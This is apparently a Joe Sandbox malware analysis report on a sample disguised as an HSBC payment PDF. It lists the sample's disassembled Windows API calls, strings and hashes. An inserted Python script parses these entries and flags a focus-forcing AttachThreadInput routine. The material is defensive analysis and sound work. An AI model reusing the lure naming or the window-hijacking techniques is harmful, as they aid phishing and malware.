• Instruction ID: 63d5a068ad5a56aba220708db6a6aa365c702eef260e2cf9077a2f95fd26ae7a
• Opcode Fuzzy Hash: 75c02351080d399f54f50797f1575012d7efe7bac2141c4c0566531984a89c98
• Instruction Fuzzy Hash: 6751AE711183009BC700EF15C892AAFB7E5EF94308F544C2FF495672A2EB399D19CA5B
APIs
• _memset.LIBCMT ref: 0048716A
• CreateMenu.USER32 ref: 00487185
• SetMenu.USER32(?,00000000), ref: 00487194
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487221
• IsMenu.USER32(?), ref: 00487237
• CreatePopupMenu.USER32 ref: 00487241
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0048726E
• DrawMenuBar.USER32 ref: 00487276
Strings
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
• String ID: 0$F
• API String ID: 176399719-3044882817
• Opcode ID: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
• Instruction ID: ef621a00a8965f8f9a50d7f8a7e1c0e3a51c02c5d80a3ac9dc969039337b3b35
• Opcode Fuzzy Hash: 8d361ed52167b8eab7a66d10bcbcea6876906ccdec482831028141534145e52f
• Instruction Fuzzy Hash: 2A419B74A01204EFDB10EF64D898E9E7BB5FF09300F240469F915A7361D735A910DF98
APIs
• _memset.LIBCMT ref: 00426E3E
  • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
• __gmtime64_s.LIBCMT ref: 00426ED7
• __gmtime64_s.LIBCMT ref: 00426F0D
• __gmtime64_s.LIBCMT ref: 00426F2A
• __allrem.LIBCMT ref: 00426F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426F9C
• __allrem.LIBCMT ref: 00426FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00426FD1
• __allrem.LIBCMT ref: 00426FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00427006
• __invoke_watson.LIBCMT ref: 00427077
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: cc18d51bddcb3bff235d9ba930da6ebb912618c2495e950f743dda1aeb2a8d13
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: F8710876B00726ABD714AF79EC41B5BB3A4AF04328F55412FF514D7281EB78ED048B98
APIs
• _memset.LIBCMT ref: 00462542
• GetMenuItemInfoW.USER32(004C5890,000000FF,00000000,00000030), ref: 004625A3
• SetMenuItemInfoW.USER32(004C5890,00000004,00000000,00000030), ref: 004625D9
• Sleep.KERNEL32(000001F4), ref: 004625EB
• GetMenuItemCount.USER32(?), ref: 0046262F
• GetMenuItemID.USER32(?,00000000), ref: 0046264B
• GetMenuItemID.USER32(?,-00000001), ref: 00462675
• GetMenuItemID.USER32(?,?), ref: 004626BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462714
                                                                                                                                                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462735
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
• Instruction ID: d041e2a6511ad081bd824cff42eca7b157938f8ca15e77e0b80393dec237999e
• Opcode Fuzzy Hash: b0f46b9daa1905a6cfa597ce9f08befe4fcaea4ae8b00d429bdca1168be675da
• Instruction Fuzzy Hash: 3361B470900A49BFDB11CF64CE84DBF7BB8FB01345F14046AE842A7251E7B9AD05DB2A
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00486FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00486FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00486FCC
• _memset.LIBCMT ref: 00486FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00486FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00487067
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
• Instruction ID: 7132dcb9391edd1f4fca7d59f8acd98ed1f58d557d43f29f177e0b8d5bde9df6
• Opcode Fuzzy Hash: 4336d240a59bbb388c973f46f1178136a6457c7e14c292988be6c5ed4532a5ee
• Instruction Fuzzy Hash: 17618E75900208AFDB10EFA4CC85EEE77B8EB09700F20056AFA14A73A1C775AD51DB64
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00456BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00456C18
• VariantInit.OLEAUT32(?), ref: 00456C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00456C4A
• VariantCopy.OLEAUT32(?,?), ref: 00456C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00456CB1
• VariantClear.OLEAUT32(?), ref: 00456CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00456CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CDC
• VariantClear.OLEAUT32(?), ref: 00456CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00456CF9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
• Instruction ID: 21fd5a8c16b11a42553d074c3324144f158a868588d4a73b9a3ed32873cef97c
• Opcode Fuzzy Hash: f1379b8d06b3f903a5e910e956f09b0d2a9745292c14bd0cd64e072d7f41818e
• Instruction Fuzzy Hash: F1418231A001199FCF00DFA9D8449AEBBB9EF18315F01847EE955E7362CB34A949CF94
APIs
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
• CoInitialize.OLE32 ref: 00478403
• CoUninitialize.OLE32 ref: 0047840E
• CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 0047846E
• IIDFromString.OLE32(?,?), ref: 004784E1
• VariantInit.OLEAUT32(?), ref: 0047857B
• VariantClear.OLEAUT32(?), ref: 004785DC
Strings
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
• Opcode ID: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
• Instruction ID: cb75df2b24e16c1c2e0b5d8d850f15e0fc33cba1d2aa6ec0deb68a9cf625d14d
• Opcode Fuzzy Hash: bddeeabf73b366b14407c3e71f23e64711764d0829d4ad9168793951bdc54c34
• Instruction Fuzzy Hash: AA61C170648312AFC710DF14C848B9FB7E8AF44744F00881EF9899B291DB78ED48CB9A
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0046B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B546
• GetLastError.KERNEL32 ref: 0046B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0046B5BD
Strings
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
• Opcode ID: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
• Instruction ID: 3fb85926d1a8df40b98e85eadc692d0a6e2328ff5e483d9ffe01cb822ebdbf3c
• Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
• Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
• GetDlgCtrlID.USER32 ref: 0045901F
• GetParent.USER32 ref: 0045903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
• GetDlgCtrlID.USER32(?), ref: 00459047
• GetParent.USER32(?), ref: 00459063
• SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066
Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                                    • Opcode ID: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                                                                                    • Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
                                                                                                                                                    • Opcode Fuzzy Hash: 70b00899020a6935ed5be547ea879312aebc4391e40c277213c8505d4346909e
                                                                                                                                                    • Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                      • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
                                                                                                                                                    • GetDlgCtrlID.USER32 ref: 00459108
                                                                                                                                                    • GetParent.USER32 ref: 00459124
                                                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
                                                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00459130
                                                                                                                                                    • GetParent.USER32(?), ref: 0045914C
                                                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                                                    • Opcode ID: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                                                                                    • Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
                                                                                                                                                    • Opcode Fuzzy Hash: 76c298384857a0c05b8993852c86e7b1b6c4ac97cbcf8f08457efd25aebf9e7b
                                                                                                                                                    • Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29
                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32 ref: 0045916F
                                                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00459196
                                                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                                                    • Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                                                                                    • Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
                                                                                                                                                    • Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
                                                                                                                                                    • Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004611F0
                                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
                                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                    • Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                                                                                    • Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
                                                                                                                                                    • Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
                                                                                                                                                    • Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E
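The "APIs" listings printed for each disassembled function above (the ListBox/ComboBox SendMessageW helpers, and the GetForegroundWindow / GetWindowThreadProcessId / AttachThreadInput routine just listed) all follow one line shape: an optional "Part of subcall function" prefix, `Api.MODULE(args)`, and a `ref:` address. The parser below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It reads a handful of those entries, constructed inline from the lines above, decodes the Msg argument of SendMessageW against a small table of Win32 constants (WM_COMMAND 0x0111, LB_SETCURSEL 0x0186, LB_SELECTSTRING 0x018C, CB_SETCURSEL 0x014E), and flags the AttachThreadInput attach-then-detach pair that surrounds GetForegroundWindow, the standard trick for forcing keyboard focus onto a window owned by another thread. The `ENTRY_RE` pattern, the `ApiCall`/`FuncBlock` types and the `uses_focus_forcing` heuristic are assumptions of the example. Caveat for anyone extending it: the report's argument columns are stack snapshots and can be shifted (the 0x0111 WM_COMMAND value sits in the third column on several lines above), so only a literal hex value in the second argument slot is decoded, and a `?` is left undecoded rather than guessed.

```python
"""Parse Joe Sandbox per-function "APIs" entries and decode what they do.

Added example for this page; ENTRY_RE, the dataclasses and the focus-forcing
heuristic are assumptions of the example, not Joe Sandbox's own code.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One report entry, e.g.
#   • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
#   • GetDlgCtrlID.USER32 ref: 0045901F
#     • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
ENTRY_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Win32 message constants the report shows as raw hex (values from winuser.h).
WINDOW_MESSAGES = {
    0x0111: "WM_COMMAND",
    0x014D: "CB_SELECTSTRING",
    0x014E: "CB_SETCURSEL",
    0x0186: "LB_SETCURSEL",
    0x0188: "LB_GETCURSEL",
    0x018C: "LB_SELECTSTRING",
}

# Constructed sample: entries in the exact shape the report prints them.
SAMPLE = """\
APIs
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
• GetDlgCtrlID.USER32 ref: 0045901F
• GetParent.USER32 ref: 0045903B
• SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
Strings
APIs
• GetCurrentThreadId.KERNEL32 ref: 004611F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
• GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
Memory Dump Source
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]      # None where the report printed '?'
    ref: int                       # address of the call site
    subcall_of: Optional[int]      # callee address for "Part of subcall function"


@dataclass
class FuncBlock:
    calls: List[ApiCall] = field(default_factory=list)


def _parse_args(raw: Optional[str]) -> List[Optional[int]]:
    """'?,0000018C,000000FF' -> [None, 0x18C, 0xFF]; unknown tokens become None."""
    if not raw or not raw.strip():
        return []
    out = []
    for tok in raw.split(","):
        tok = tok.strip()
        try:
            out.append(None if tok == "?" else int(tok, 16))
        except ValueError:
            out.append(None)
    return out


def parse_report(text: str) -> List[FuncBlock]:
    """Group entries into one FuncBlock per 'APIs' header; any other header ends a block."""
    blocks: List[FuncBlock] = []
    current: Optional[FuncBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FuncBlock()
            blocks.append(current)
            continue
        m = ENTRY_RE.search(line)
        if m and current is not None:
            sub = m.group("sub")
            current.calls.append(ApiCall(
                api=m.group("api"), module=m.group("mod"),
                args=_parse_args(m.group("args")), ref=int(m.group("ref"), 16),
                subcall_of=int(sub, 16) if sub else None))
        elif current is not None and line.strip():
            current = None  # "Strings", "Memory Dump Source", ... close the block
    return blocks


def decode_send_message(call: ApiCall) -> Optional[str]:
    """Name the Msg (second argument) of a SendMessageW entry; None if not recoverable."""
    if call.api != "SendMessageW" or len(call.args) < 2 or call.args[1] is None:
        return None
    return WINDOW_MESSAGES.get(call.args[1], f"0x{call.args[1]:04X}")


def uses_focus_forcing(block: FuncBlock) -> bool:
    """Foreground-thread lookup plus AttachThreadInput(..., TRUE) and (..., FALSE)."""
    direct = {c.api for c in block.calls if c.subcall_of is None}
    if not {"GetForegroundWindow", "GetWindowThreadProcessId"} <= direct:
        return False
    attach_flags = [c.args[2] for c in block.calls
                    if c.api == "AttachThreadInput" and len(c.args) > 2]
    return 1 in attach_flags and 0 in attach_flags


if __name__ == "__main__":
    for i, blk in enumerate(parse_report(SAMPLE)):
        print(f"function block {i}: focus forcing = {uses_focus_forcing(blk)}")
        for c in blk.calls:
            msg = decode_send_message(c)
            print(f"  {c.api}.{c.module} @ {c.ref:08X}" + (f"  -> {msg}" if msg else ""))
```

Running the block prints the ListBox helper with its Msg resolved to LB_SELECTSTRING and marks the second block as the focus-forcing routine; the second SendMessageW line in the first block stays undecoded because its second column is `?`.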
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                                                                                    • String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                    • API String ID: 2862541840-2080382077
                                                                                                                                                    • Opcode ID: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                                                                                                                    • Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
                                                                                                                                                    • Opcode Fuzzy Hash: 4876e0fe4e6e65ed2aee25e8811e5c19d6b5f5c946948c970bae7899105c18ce
                                                                                                                                                    • Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4
                                                                                                                                                    APIs
                                                                                                                                                    • EnumChildWindows.USER32(?,0045A439), ref: 0045A377
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                                                    • Opcode ID: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                                                                                                                    • Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
                                                                                                                                                    • Opcode Fuzzy Hash: ec1b2c5ef55112558705b1f2f9e35d7e0ecf4ffddfa086fd6d13dd20cc331da8
                                                                                                                                                    • Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                                                                                                      • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                                                                                                      • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                                                                                                      • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                                                                                                                    • GetDC.USER32 ref: 0043CD32
                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0043CD53
                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0043CD68
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0043CD70
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
